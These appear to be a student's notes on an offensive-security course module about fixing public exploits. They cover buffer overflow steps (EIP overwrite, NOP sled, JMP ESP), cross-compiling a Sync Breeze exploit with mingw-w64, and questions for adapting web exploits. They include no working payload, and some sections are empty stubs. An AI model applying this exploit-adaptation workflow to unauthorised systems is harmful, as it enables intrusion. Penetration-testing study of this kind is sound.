Module 13: Fixing Exploits

Fixing Memory Corruption Exploits

Buffer Overflow in a Nutshell

General flow of a standard stack-based buffer overflow:

  1. Create a large buffer to trigger the overflow.

  2. Take control of EIP by overwriting a return address on the stack, padding the large buffer with an appropriate offset.

  3. Include a chosen payload in the buffer prepended by an optional NOP5 sled.

  4. Choose a correct return address instruction such as JMP ESP (or a different register) to redirect the execution flow to the payload.

Importing and Examining the Exploit

Be aware of the difference between compiled code and code run through an interpreter.

Cross-Compiling Exploit Code

In most scenarios, it is best to use native compilers for the specific OS targeted, though this may not always be an option. In this case, use a cross-compiler like mingw-w64. Installation: sudo apt install mingw-w64

Test out the compilation to determine if errors occur. Example: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe In this specific case, an error referencing _imp__WSAStartup@8 bein googled, tells us that it is a function in winsock.h which couldn't be found. The resolution being that we can include the -lws2_32 parameter to our previous command. Revised example: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

Fixing the Exploit

No comment.

Changing the Overflow Buffer

No comment.

Fixing Web Exploits

Considerations and Overview

Key questions:

  • Does it initiate an HTTP or HTTPS connection?

  • Does it access a specific web application path or route?

  • Does the exploit leverage a pre-authentication vulnerability?

  • If not, how does the exploit authenticate to the web application?

  • How are the GET or POST requests crafted to trigger and exploit the vulnerability? Is there any HTTP method involved?

  • Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?

  • Will oddities such as self-signed certificates disrupt the exploit?

Selecting the Vulnerability and Fixing the Code

Pretty straightforward, look at the code and update as needed.

Troubleshooting the "index out of range" Error

...print out the variable causing issues to troubleshoot...

PreviousModule 12: Locating Public ExploitsNextModule 14: Antivirus Evasion

Last updated